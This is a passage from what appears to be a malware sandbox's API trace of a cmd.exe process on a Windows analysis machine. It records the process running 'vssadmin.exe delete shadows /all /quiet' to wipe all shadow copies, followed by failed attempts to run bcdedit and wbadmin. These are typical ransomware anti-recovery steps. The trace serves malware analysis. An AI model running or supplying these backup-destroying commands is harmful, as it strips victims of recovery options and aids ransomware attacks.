_String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.696] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.696] GetProcessHeap () returned 0x460000 [0069.696] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x474710 | out: hHeap=0x460000) returned 1 [0069.696] GetProcessHeap () returned 0x460000 [0069.696] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xa) returned 0x470128 [0069.696] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.697] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x36f1a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36f1ec | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessInformation=0x36f1ec*(hProcess=0x78, hThread=0x74, dwProcessId=0x900, dwThreadId=0x640)) returned 1 [0070.454] CloseHandle (hObject=0x74) returned 1 [0070.454] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.454] GetProcessHeap () returned 0x460000 [0070.454] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475910 | out: hHeap=0x460000) returned 1 [0070.454] GetEnvironmentStringsW () returned 0x474950* [0070.454] GetProcessHeap () returned 0x460000 [0070.454] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb36) returned 0x475490 [0070.454] FreeEnvironmentStringsW (penv=0x474950) returned 1 [0070.454] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.901] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x36f0e0 | out: lpExitCode=0x36f0e0*=0x2) returned 1 [0072.901] CloseHandle (hObject=0x78) returned 1 [0072.901] _vsnwprintf (in: _Buffer=0x36f228, _BufferCount=0x13, _Format="%08X", _ArgList=0x36f0ec | out: _Buffer="00000002") returned 8 [0072.901] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.902] GetProcessHeap () returned 0x460000 [0072.902] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x475490 | out: hHeap=0x460000) returned 1 [0072.902] GetEnvironmentStringsW () returned 0x474950* [0072.902] GetProcessHeap () returned 0x460000 [0072.902] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4754b8 [0072.902] FreeEnvironmentStringsW (penv=0x474950) returned 1 [0072.902] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.902] GetProcessHeap () returned 0x460000 [0072.902] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4754b8 | out: hHeap=0x460000) returned 1 [0072.902] GetEnvironmentStringsW () returned 0x474950* [0072.902] GetProcessHeap () returned 0x460000 [0072.902] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xb5c) returned 0x4754b8 [0072.902] FreeEnvironmentStringsW (penv=0x474950) returned 1 [0072.902] GetProcessHeap () returned 0x460000 [0072.902] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x470128 | out: hHeap=0x460000) returned 1 [0072.902] DeleteProcThreadAttributeList (in: lpAttributeList=0x36f144 | out: lpAttributeList=0x36f144) [0072.902] GetConsoleTitleW (in: lpConsoleTitle=0x36f4c4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0072.902] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x476020 [0072.902] GetProcessHeap () returned 0x460000 [0072.902] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x80) returned 0x474730 [0072.903] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x472460 [0072.903] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x472468, lpFilePart=0x36efe4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36efe4*="Desktop") returned 0x25 [0072.903] SetErrorMode (uMode=0x0) returned 0x1 [0072.903] GetProcessHeap () returned 0x460000 [0072.903] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x472460, Size=0x64) returned 0x472460 [0072.903] GetProcessHeap () returned 0x460000 [0072.903] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x472460) returned 0x64 [0072.903] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0072.903] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0072.903] GetProcessHeap () returned 0x460000 [0072.903] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x476238 [0072.903] GetProcessHeap () returned 0x460000 [0072.903] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x4724d0 [0072.903] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4724d0, Size=0x122) returned 0x4724d0 [0072.903] GetProcessHeap () returned 0x460000 [0072.903] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4724d0) returned 0x122 [0072.903] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0072.903] GetProcessHeap () returned 0x460000 [0072.903] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x476360 [0072.903] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x476360, Size=0x76) returned 0x476360 [0072.903] GetProcessHeap () returned 0x460000 [0072.903] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x476360) returned 0x76 [0072.903] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.904] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.904] GetLastError () returned 0x2 [0072.904] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.904] GetLastError () returned 0x2 [0072.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.904] GetLastError () returned 0x2 [0072.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.904] GetLastError () returned 0x2 [0072.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.904] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.905] GetLastError () returned 0x2 [0072.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.905] GetLastError () returned 0x2 [0072.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.905] GetLastError () returned 0x2 [0072.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.905] GetLastError () returned 0x2 [0072.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.905] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.906] GetLastError () returned 0x2 [0072.906] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ed60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ed60) returned 0xffffffff [0072.908] GetLastError () returned 0x2 [0072.910] _get_osfhandle (_FileHandle=2) returned 0xb [0072.910] GetFileType (hFile=0xb) returned 0x2 [0072.910] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0072.910] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x36f1b4 | out: lpMode=0x36f1b4) returned 1 [0072.910] _get_osfhandle (_FileHandle=2) returned 0xb [0072.910] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x36f1e8 | out: lpConsoleScreenBufferInfo=0x36f1e8) returned 1 [0072.911] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49f14640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0072.912] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49f14640, nSize=0x2000, Arguments=0x36f228 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0072.912] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49f14640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x36f20c, lpReserved=0x0 | out: lpBuffer=0x49f14640*, lpNumberOfCharsWritten=0x36f20c*=0x62) returned 1 [0072.912] GetConsoleTitleW (in: lpConsoleTitle=0x36f460, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0072.912] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x472600 [0072.912] GetProcessHeap () returned 0x460000 [0072.912] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x60) returned 0x4763e0 [0072.913] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x472818 [0072.913] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x472820, lpFilePart=0x36ef80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36ef80*="Desktop") returned 0x25 [0072.913] SetErrorMode (uMode=0x0) returned 0x1 [0072.913] GetProcessHeap () returned 0x460000 [0072.913] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x472818, Size=0x64) returned 0x472818 [0072.913] GetProcessHeap () returned 0x460000 [0072.913] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x472818) returned 0x64 [0072.913] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0072.913] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0072.913] GetProcessHeap () returned 0x460000 [0072.913] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x472888 [0072.913] GetProcessHeap () returned 0x460000 [0072.913] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x4729b0 [0072.913] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4729b0, Size=0x122) returned 0x4729b0 [0072.913] GetProcessHeap () returned 0x460000 [0072.913] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4729b0) returned 0x122 [0072.913] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0072.913] GetProcessHeap () returned 0x460000 [0072.913] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x472ae0 [0072.913] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x472ae0, Size=0x76) returned 0x472ae0 [0072.913] GetProcessHeap () returned 0x460000 [0072.913] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x472ae0) returned 0x76 [0072.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.913] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.913] GetLastError () returned 0x2 [0072.914] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.914] GetLastError () returned 0x2 [0072.914] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.914] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.914] GetLastError () returned 0x2 [0072.914] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.914] GetLastError () returned 0x2 [0072.914] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.914] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.914] GetLastError () returned 0x2 [0072.914] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.914] GetLastError () returned 0x2 [0072.914] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.915] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.915] GetLastError () returned 0x2 [0072.915] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.915] GetLastError () returned 0x2 [0072.915] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.915] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.917] GetLastError () returned 0x2 [0072.917] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x36ecfc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ecfc) returned 0xffffffff [0072.918] GetLastError () returned 0x2 [0072.918] _get_osfhandle (_FileHandle=2) returned 0xb [0072.918] GetFileType (hFile=0xb) returned 0x2 [0072.918] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0072.918] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x36f150 | out: lpMode=0x36f150) returned 1 [0072.919] _get_osfhandle (_FileHandle=2) returned 0xb [0072.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x36f184 | out: lpConsoleScreenBufferInfo=0x36f184) returned 1 [0072.919] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49f14640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0072.919] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49f14640, nSize=0x2000, Arguments=0x36f1c4 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0072.919] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49f14640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x36f1a8, lpReserved=0x0 | out: lpBuffer=0x49f14640*, lpNumberOfCharsWritten=0x36f1a8*=0x62) returned 1 [0072.919] GetConsoleTitleW (in: lpConsoleTitle=0x36f3fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0072.919] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x472b60 [0072.919] GetProcessHeap () returned 0x460000 [0072.919] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x48) returned 0x472d78 [0072.919] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x474950 [0072.920] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x474958, lpFilePart=0x36ef1c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36ef1c*="Desktop") returned 0x25 [0072.920] SetErrorMode (uMode=0x0) returned 0x1 [0072.920] GetProcessHeap () returned 0x460000 [0072.920] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474950, Size=0x64) returned 0x474950 [0072.920] GetProcessHeap () returned 0x460000 [0072.920] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474950) returned 0x64 [0072.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0072.920] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0072.920] GetProcessHeap () returned 0x460000 [0072.920] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x120) returned 0x472dc8 [0072.920] GetProcessHeap () returned 0x460000 [0072.920] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x238) returned 0x4749c0 [0072.920] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4749c0, Size=0x122) returned 0x4749c0 [0072.920] GetProcessHeap () returned 0x460000 [0072.920] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4749c0) returned 0x122 [0072.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0072.920] GetProcessHeap () returned 0x460000 [0072.920] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x474af0 [0072.920] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474af0, Size=0x76) returned 0x474af0 [0072.920] GetProcessHeap () returned 0x460000 [0072.920] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x474af0) returned 0x76 [0072.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.920] GetLastError () returned 0x2 [0072.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.921] GetLastError () returned 0x2 [0072.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.921] GetLastError () returned 0x2 [0072.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.921] GetLastError () returned 0x2 [0072.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.921] GetLastError () returned 0x2 [0072.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.921] GetLastError () returned 0x2 [0072.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.922] GetLastError () returned 0x2 [0072.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.922] GetLastError () returned 0x2 [0072.922] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0072.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.923] GetLastError () returned 0x2 [0072.923] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x36ec98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x36ec98) returned 0xffffffff [0072.925] GetLastError () returned 0x2 [0072.925] _get_osfhandle (_FileHandle=2) returned 0xb [0072.925] GetFileType (hFile=0xb) returned 0x2 [0072.925] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0072.925] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x36f0ec | out: lpMode=0x36f0ec) returned 1 [0072.925] _get_osfhandle (_FileHandle=2) returned 0xb [0072.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x36f120 | out: lpConsoleScreenBufferInfo=0x36f120) returned 1 [0072.926] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49f14640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0072.926] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49f14640, nSize=0x2000, Arguments=0x36f160 | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0072.926] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49f14640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x36f144, lpReserved=0x0 | out: lpBuffer=0x49f14640*, lpNumberOfCharsWritten=0x36f144*=0x62) returned 1 [0072.926] GetConsoleTitleW (in: lpConsoleTitle=0x36f3fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0072.926] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x474b70 [0072.926] GetProcessHeap () returned 0x460000 [0072.926] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x38) returned 0x46f628 [0072.926] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x474d88 [0072.927] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x474d90, lpFilePart=0x36ef1c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36ef1c*="Desktop") returned 0x25 [0072.927] SetErrorMode (uMode=0x0) returned 0x1 [0072.927] GetProcessHeap () returned 0x460000 [0072.927] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x474d88, Size=0x5e) returned 0x474d88 [0072.927] GetProcessHeap () returned 0x460000 [0072.927] RtlSizeHeap (HeapHandle=0x460000, 